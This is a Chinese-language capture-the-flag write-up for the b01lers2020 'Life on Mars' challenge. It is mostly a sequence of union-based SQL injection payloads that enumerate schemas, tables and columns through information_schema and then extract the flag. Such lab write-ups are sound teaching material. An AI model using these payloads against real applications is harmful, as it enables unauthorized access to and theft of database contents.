[b01lers2020]Life on Mars(sql注入)

我们打开页面,发现啥信息都没有,我们随便点击一个地名抓包看看

image-20240715203732986

我们访问/query?search=amazonis_planitia

image-20240715203901604

我们进行sql注入

先查询数据库

1
?search=amazonis_planitia union select 1,database();

得到库名aliens

image-20240715204104392

再查询表名

1
?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema="aliens";

image-20240715204341022

看不出啥玩意

我们猜测可能还存在其他的库

1
?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata;

image-20240715204501018

果然还存在其它的库information_schema,alien_code,aliens

我们查询alien_code的表

1
?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema="alien_code";

image-20240715205305130

我们查询code的字段

1
?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name="code";

image-20240715205356863

我们查询code字段的内容

1
?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code;

得到flag

image-20240715205545439